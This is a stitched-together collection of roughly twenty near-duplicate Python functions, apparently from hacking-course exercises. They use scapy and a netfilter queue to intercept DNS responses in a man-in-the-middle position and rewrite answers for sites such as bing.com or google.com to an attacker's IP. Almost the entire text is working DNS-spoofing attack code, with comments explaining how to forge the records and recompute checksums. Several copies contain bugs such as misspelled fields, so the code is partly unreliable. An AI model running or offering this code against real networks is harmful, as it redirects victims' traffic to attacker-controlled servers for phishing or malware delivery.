def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload()) #converting the packet to a scpay packet by wraping the payload of
# the packet with a scapy ip layer so as to access the data of the packet by using print(scapy_packet.show()
if scapy_packet.haslayer(scapy.DNSRR): #we only want to work on the DNS layer and modify the responses of the DNS server
#so we receive the request from the target computer(by becoming the man in the middle) and then forward it to the DNS server
#wait for response from the DNS server and modify it to whatever website we want(maybe to a hacker server). In order to specify
#DNS responses we use scapy.DNSRR(RR: Response Record) and if we wanted to specify the DNS requests we use scapy.DNSQR(QR: Question Record)
qname = scapy_packet[scapy.DNSQR].qname
if "www.google.com" in qname:
print("[+] Spoofing target")
answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.15")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1 # The original count of answers maybe of any value but we are only sending one answer hence we set it equal to one.
del scapy_packet[scapy.IP].len # the length layer specifies the size of the layer and the chksum is used to make sure that the packet has
del scapy_packet[scapy.IP].chksum # not been modified and to make sure that these values do not corrupt our scapy packet we deleter these fields
del scapy_packet[scapy.UDP].chksum # and then scapy automatically re-calculate these fields according to our modified packet before it gets sent
del scapy_packet[scapy.UDP].len
#print(scapy_packet.show()) #packet will get printed with its layers with the help of the .show() method just like we used this method on the packets sniffed with scapy
packet.set_payload(str(scapy_packet)) # Here we typecast our scapy packet to a string because we at first converted the packet
# to a scapy packet so as to print its layers and modify it accordingly also, if we print our original packet we will just get
# a string of data inside this packet and we will not be able to access the layers nicely the same way that we do with the scapy packet.
packet.accept()
def process_packet(packet):
global TARGET_SITE
global REDIRECT_SITE
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
#if TARGET_SITE in str(qname): #python 3
if TARGET_SITE in qname: #python 2
print("[+] Target site requested. - Spoofing to : "+REDIRECT_SITE)
answer = scapy.DNSRR(rrname = qname, rdata = REDIRECT_SITE)
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
if scapy_packet.haslayer(scapy.IP):
if scapy_packet[scapy.IP].len:
del scapy_packet[scapy.IP].len
if scapy_packet[scapy.IP].chksum:
del scapy_packet[scapy.IP].chksum
if scapy_packet.haslayer(scapy.UDP):
if scapy_packet[scapy.UDP].len:
del scapy_packet[scapy.UDP].len
if scapy_packet[scapy.UDP].chksum:
del scapy_packet[scapy.UDP].chksum
packet.set_payload(str(scapy_packet)) #python 2
#packet.set_payload(str(scapy_packet).encode()) #python 3
packet.accept()
def process_packet(packet):
# print(packet)
scapy_packet = scapy.IP(packet.get_payload())
# print(scapy_packet)
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if "bing.com" in qname:
print("[+] Spoofing target")
answer = scapy.DNSRR(rrname=qname, rdata=kali_ip)
# an is the number of DNS redirect in packet
scapy_packet[scapy.DNS].an = answer
# ancount is the number of DNS redirect in packet
scapy_packet[scapy.DNS].ancount = 1
# scapy rebuild this field automaticly if we delete
# len of the IP part and a security chksum to know if we change it
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
# len of the UDP part and a security chksum to know if we change it
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
packet.set_payload(str(scapy_packet))
# print(scapy_packet.show())
packet.accept()
def process_pkt(packet):
"""The call back function form queue.bind on line 43"""
target_url = domain
#Converting the netfilter packet to a scapy packet
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(
scapy.DNSRR): #If that packet has the payer of DNSResponse
qname = scapy_packet[
scapy.
DNSQR].qname #Taking the query that the target made from the DNSOuery
if target_url in str(qname):
print('[+] Spoofing for ' + target_url + ' as ' + redirection)
answer = scapy.DNSRR(
rrname=qname,
rdata=redirection) #Making a pkt to send for spoofing
scapy_packet[
scapy.
DNS].an = answer #Replacing the answer layer with the layer we created"""
scapy_packet[
scapy.DNS].ancount = 1 #Removing the answer count in the pkt
#Removing the stuff that will cause errors in our pkt on the receiver
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
#All this will be recalculated by scapy
packet.set_payload(
bytes(scapy_packet)) #Setting the payload in the original pkt
packet.accept() #Forwarding the payload pkt
def process_packet(packet):
# si imprimimos lo del metodo get_payload muestra mas info parecida a usar scapy
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if "www.vulnweb.com" in str(qname):
print("[+] Spoofing target")
# print(scapy_packet.show())
# Modificamos los valores primero el response y asignamos el qname que se obtuvo es decir
# la pagina que suplantaremos.
# Y modificalos el campo rdata a la nueva ip que designaremos en el dns
# Modifica el paquete para ver cada campo y como modificarlo se puede ver en el show
answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.11")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
# Los valores de cheksum se aseguran que no hayan sido modificados los paquetes
# Si son removidos scapy automaticamente genera esos paquetes :)
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
# Convertimos el packete scapy a un str y eso se lo damos al packet
packet.set_payload(bytes(scapy_packet))
# sino se aceptan no pasaran de la cola si estan siendo interceptados
# se puede hacer un drop y le denegaremos el acceso a internet
packet.accept()
def process_packet(packet):
'''
packet.accept() accept the packet and connection throw
packet.drop() cut the internet connection :)
packet.get_payload() show all info about packet like scapy
but we need scapy to add packet to it because i need to deal with this packet as snifft
'''
# here we add packet to IP layer in scapy
scapy_packet = scapy.IP(packet.get_payload())
# DNSRQ dns request, DNSRR dns response
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if site_dns_attack in str(qname):
print('[+] Spoofing target')
answer = scapy.DNSRR(rrname=qname, rdata=fack_site)
# change answer
scapy_packet[scapy.DNS].an = answer
# change count of answer to 1 because we add one answer
scapy_packet[scapy.DNS].ancount = 1
# delete all feild can interrubt our answer and scapy will return calc it and add it
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
# add our modified to the orginal packet
packet.set_payload(bytes(scapy_packet))
# accept the packet and make it throw :)
packet.accept()
def process_packet(packet):
# print(packet.get_payload())
# We will need to be able to convert the packet.get_payload to a scapy packet
# to modify and analyze specific layers that we want and send the requests and
# responses that we want
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if "www.bing.com" in qname:
print("[+] Spoofing target")
answer = scapy.DNSRR(rrname=qname, rdata="192.168.1.113")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
# We remove the cheksum and len so the packet is able to recalculate both fields
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
# If we convert the packet we will be able to convert the original packet to the modificated one
packet.set_payload(str(scapy_packet))
# print(scapy_packet.show())
packet.accept()
def process_packet(packet):
# convert the packets into scapy packets and analyse the IP headers
scapy_packet = scapy.IP(packet.get_payload())
# if this packet is DNS response type
if scapy_packet.haslayer(scapy.DNSRR):
# put this packet into a variable
qname = scapy_packet[scapy.DNSQR].qname
# if this qname response has the specific site
if "www.itmix.gr" in qname:
print("[+] Spoofing target")
# fool the victim and modify attributes of the packet with changed IP (THE ONE OF THE ATTACKER)
answer = scapy.DNSRR(rrname=qname, rdata="192.168.22.7")
# set the answer variable as a dns response
scapy_packet[scapy.DNS].an = answer
# set only one answer
scapy_packet[scapy.DNS].ancount = 1
# delete the attributes that check the originality of communication
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
# set the scapy packet (modified packet) as the main packet
packet.set_payload(str(scapy_packet))
# show the packets general view
# print(scapy_packet.show())
# accept or drop the packets of the queue
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(
packet.get_payload()
) # Give scapy the payload of the packet. Converted the packet to a scapy packet.
# Modify the scapy packet.
if scapy_packet.haslayer(
scapy.DNSRR
): # if the packet has a layer for DNS Response DNSRR (DNS Query is DNSRQ). We're looking for DND response.
qname = scapy_packet[scapy.DNSQR].qname
if "www.digg.com" in qname:
print("[+] Spoofing Target! ")
answer = scapy.DNSRR(
rrname=qname, rdata="172.16.61.208"
) # We have apache server running on Kali machine @ 172.16.61.207 service apache2 start and query name is "www.bing.com" here
scapy_packet[
scapy.
DNS].an = answer # Modify scapy packet to the correct answer.
scapy_packet[scapy.DNS].ancount = 1 # Modify answer count
# The packets has length and chcksum field. That might corrupt our created packet. We'll simply delete chcksum and len field for IP and UDP and make scapy calculate it for us.
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
packet.set_payload(
str(scapy_packet)
) # Convert back the scapy_packet to a normal string and then give it back to the actual packet.
packet.accept() # accept() will simply forward the packet
def captured_packet(packet):
packet_cap = scapy.IP(packet.get_payload())
if packet_cap.haslayer(scapy.DNSRR):
qname = packet_cap[scapy.DNSQR].qname
if "www.bing.com" in qname:
print("[+] spoofing the target")
answer = scapy.DNSRR(rrname=qname, rdata="192.168.8.1")
packet_cap[scapy.DNS].qname = answer
packet_cap[scapy.DNS].ancount = 1
del packet_cap[scapy.IP].chksum
del packet_cap[scapy.Ip].len
del packet_cap[scapy.UDP].len
del packet_cap[scapy.UDP].chksum
packet.set_payload(str(packet_cap))
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(
packet.get_payload()
) # We converted it to scapy to allow us to access it's layers as the normal DNS packet is only string not layers
if scapy_packet.haslayer(
scapy.DNSRR
): # DNSRR stands for DNS Resource Record which is a DNS response
qname = scapy_packet[scapy.DNSQR].qname
if "www.bing.com".encode() in qname:
print('[+] Spoofing target')
website = "192.169.1.111"
answer = scapy.DNSRR(rrname=qname, rdata=website)
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[
scapy.
IP].len # We remove them and scapy will automatically calculate them while sending the new packet containing the modified answers
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
packet.set_payload(
str(scapy_packet)
) # We returned it using string to return it to its original state
packet.accept()
def process_packet(packet):
#setting a variable named scapy_packet equal to the ip layer packet response
scapy_packet = scapy.IP(packet.get_payload())
#DNSRR is the DNS response. If our packet has a DNS response in it and the qname(website name) has 'www.bing.com' in
#it, print our text and modify the packet using the ip address of the web host we want to spoof.
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if "www.bing.com" in qname:
print("[+] Spoofing target")
answer = scapy.DNSRR(rrname=qname, rdata="45.58.116.198")
#modifies the packet so it uses our answer
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
#removing these values from our packet response so scapy will auto populate them with the correct values
#based on our response
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_payload(str(scapy_packet))
packet.accept()
def capture_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
try:
b_qname = scapy_packet[scapy.DNSQR].qname
qname = b_qname.decode('utf-8')
except IndexError:
pass
if scapy_packet.haslayer(scapy.DNSRR):
if website in str(qname):
print(Fore.CYAN + Style.BRIGHT + "[*]" + Fore.LIGHTWHITE_EX +
Style.BRIGHT + " Redirecting " + str(qname) + " to " +
redirect_ip)
answer_packet = scapy.DNSRR(rrname=b_qname, rdata=redirect_ip)
scapy_packet[scapy.DNS].an = answer_packet
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[
scapy.IP].chksum # avoiding chksum error for IP Layer
del scapy_packet[scapy.IP].len # avoiding len error for IP Layer
del scapy_packet[
scapy.UDP].chksum # avoiding chksum error for UDP Layer
del scapy_packet[scapy.UDP].len # avoiding len error for UDP Layer
packet.set_payload(bytes(scapy_packet)) # setting altered packet
packet.accept()
def process_packet(packet):
#print(packet)
#print(packet.get_payload()) # Getting payload
scapy_packet = scapy.IP(packet.get_payload()) # Coverting the packet to scapy packet so that we can interact with them.
if scapy_packet.haslayer(scapy.DNSRR): # Finding the DNS for specific site
qname = scapy_packet[scapy.DNSQR].qname # DNSQR is Question Record for DNS
# DNSRQ is for DNS Request and for DNS Response we use DNSRR
#if "www.vulnweb.com" in str(qname):
if target_website in qname:
print("[+] Spoofing Target ")
#answer = scapy.DNSRR(rrname = qname, rdata = "85.128.197.105") # Modifying the DNS Record
answer = scapy.DNSRR(rrname = qname, rdata = destination_website)
#print(scapy_packet.show())
scapy_packet[scapy.DNS].an = answer # Implementing the changes
scapy_packet[scapy.DNS].ancount = 1 # Modifing ancount(answer count to 1)
# Removing the following items so that they can't corrupt our modified packet
# Scapy will automatically calculate these according to our modified packet
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
packet.set_payload(str(scapy_packet))
#packet.payload = scapy_packet.payload
#packet[DNS] = scapy_packet[DNS]
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if "namepage" in qname:
print("[+] Spoofing target")
response = scapy.DNSRR(rrname=qname, rdata="10.0.2.15")
scapy_packet[scapy.DNS].an = response
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
print(scapy_packet.show())
packet.set_payload(str(scapy_packet))
print("VA A ACEPTAR EL PACKET")
packet.accept()
print("HA ACEPTADO EL PACKET")
else:
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(http.HTTPRequest):
if scapy_packet[scapy.TCP].dport == 80:
url = "User at ip " + str(
scapy_packet[scapy.IP].src) + " Accessed: " + str(
scapy_packet[http.HTTPRequest].Host
) #+ str(scapy_packet[http.HTTPRequest].Path)
#print(url)
write_log(url)
if scapy_packet.haslayer(scapy.DNSRR):
website_requested = scapy_packet[scapy.DNSQR].qname.decode()
for name in blocked_websites:
if name in website_requested:
print("[+] Blocking Website:", website_requested)
answer = scapy.DNSRR(rrname=website_requested,
rdata="10.0.2.14")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_payload(bytes(scapy_packet))
packet.accept()
def process_packet(packet):
print(packet)
print(packet.get_payload()) # needs to be converted to a scapy packet
scapy_packet = scapy.IP(packet.get_payload()) # wraps the packet into IP layer
if scapy_packet.haslayer(scapy.DNSRR): # check packet fields list => DNSRR stands for dns response record
qname = scapy_packet[scapy.DNSRR].qname # syntax => var[module.field].subfield
if url.encode() in qname:
answer = scapy.DNSRR(rrname=qname, rdata=attacker_ip) # creates a DNSRR response to be send to the
# target machine
scapy_packet[scapy.DNS].an = answer # sets payload to forged package
scapy_packet[scapy.DNS].ancount = 1 # check pcks sent and match num with correct value
# deletes the fields chksum and len outta each layer, scapy will recalculate them
# without it it wont work
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
packet.set_payload(bytes(scapy_packet)) # modifies original package with forged one
# print(scapy_packet.show())
# packet.drop() # choose what to do and uncomment
packet.accept() # choose what to do and uncomment
def process_packet(packet):
# print(packet)
# read data inside of packets
scapy_packet = scapy.IP(packet.get_payload()) # converted into scapy packet
if scapy_packet.haslayer(scapy.DNSRR): # DNS Resource Record
# print(scapy_packet.show())
qname = scapy_packet[scapy.DNSQR].qname
if "www.bing.com" in qname:
print("[+] Spoofing target")
answer = scapy.DNSRR(rrname=qname, rdate="192.168.2.106")
# manipulate DNSRR segment which has type A domain
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1 # modify ancount (deals with other dns packets)
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
# checksum checks if the packet has been modified
# deleting them allows scapy to re-calculate chksum value
#set payload to Packets
packet.set_payload(str(scapy_packet)) # put it back to a normal string (we converted into scapy packet at the beginning)
packet.accept() # forwarding packets to its destination
